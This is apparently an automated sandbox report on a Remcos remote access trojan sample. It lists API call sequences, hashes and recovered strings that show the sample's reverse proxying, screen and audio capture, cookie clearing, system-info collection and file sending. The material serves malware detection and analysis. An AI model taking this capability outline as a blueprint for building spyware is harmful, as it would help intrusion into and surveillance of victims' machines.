                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Eventinet_ntoa
                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$xd
                                          • API String ID: 3578746661-3766644089
                                          • Opcode ID: a03d1adf9f4d24460575b4b506fb4f9aa5cd3765f54f836e8a5c879b1408514f
                                          • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                          • Opcode Fuzzy Hash: a03d1adf9f4d24460575b4b506fb4f9aa5cd3765f54f836e8a5c879b1408514f
                                          • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                          • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                          • API String ID: 489098229-3790400642
                                          • Opcode ID: 49b368db4e9e7e60bbeb8abd80ae96f82f19b5c1f99d9777cf0882a092ba5413
                                          • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                          • Opcode Fuzzy Hash: 49b368db4e9e7e60bbeb8abd80ae96f82f19b5c1f99d9777cf0882a092ba5413
                                          • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateDeleteExecuteShellSleep
                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                          • API String ID: 1462127192-2001430897
                                          • Opcode ID: d77e28aa0d71a2c0645bdac896068900cc72b96445f33e651967d26bcbdf3e2a
                                          • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                          • Opcode Fuzzy Hash: d77e28aa0d71a2c0645bdac896068900cc72b96445f33e651967d26bcbdf3e2a
                                          • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                          • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                          • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                          • String ID: Remcos
                                          • API String ID: 1970332568-165870891
                                          • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                          • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                          • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                          • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                          • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                          APIs
                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                          • __freea.LIBCMT ref: 00454083
                                          • __freea.LIBCMT ref: 0045408F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                          • String ID:
                                          • API String ID: 201697637-0
                                          • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                          • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                          • _free.LIBCMT ref: 00445515
                                          • _free.LIBCMT ref: 0044552E
                                          • _free.LIBCMT ref: 00445560
                                          • _free.LIBCMT ref: 00445569
                                          • _free.LIBCMT ref: 00445575
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                          • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tcp$udp
                                          • API String ID: 0-3725065008
                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474F08,00404C49,00000000,00000000,00000000,?,00474F08,?), ref: 00404BA5
                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                          • String ID: .part
                                          • API String ID: 1303771098-3499674018
                                          • Opcode ID: 2150a189df16d023aaea6f06597ff48a5e6b6566d5180279f80c020d780b3e8b
                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                          • Opcode Fuzzy Hash: 2150a189df16d023aaea6f06597ff48a5e6b6566d5180279f80c020d780b3e8b
                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                          APIs
                                          • _strftime.LIBCMT ref: 00401BD4
                                            • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                          • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                          • API String ID: 3809562944-3627046146
                                          • Opcode ID: 774d76beef9008db32f03f03aba53f46b293a4d454c50c356403b75a824fba62
                                          • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                          • Opcode Fuzzy Hash: 774d76beef9008db32f03f03aba53f46b293a4d454c50c356403b75a824fba62
                                          • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                          APIs
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$hd
                                          • API String ID: 1133728706-2233801362
                                          • Opcode ID: c205dfe74dbda60eacb93fa3a46cd8cf8d8bdcdf87e24bc8b84adc5102ad8f0a
                                          • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                          • Opcode Fuzzy Hash: c205dfe74dbda60eacb93fa3a46cd8cf8d8bdcdf87e24bc8b84adc5102ad8f0a
                                          • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                          APIs
                                          • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$Window$AllocOutputShow
                                          • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                          • API String ID: 4067487056-793934204
                                          • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                          • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                          • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                          • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                          Strings
                                          • C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, xrefs: 004076FF
                                          • xdF, xrefs: 004076E4
                                          • RG, xrefs: 004076DF
                                          • Rmc-8AGIM5, xrefs: 00407715
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$Rmc-8AGIM5$xdF$RG
                                          • API String ID: 0-2921564295
                                          • Opcode ID: bfa82963eea25e7f3a1000047237d0892740d3b416b353ce1bd886ed4ccf4a83
                                          • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                          • Opcode Fuzzy Hash: bfa82963eea25e7f3a1000047237d0892740d3b416b353ce1bd886ed4ccf4a83
                                          • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                          • __freea.LIBCMT ref: 0044AEB0
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • __freea.LIBCMT ref: 0044AEB9
                                          • __freea.LIBCMT ref: 0044AEDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 3864826663-0
                                          • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                          • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                          APIs
                                          • SendInput.USER32 ref: 00419A25
                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
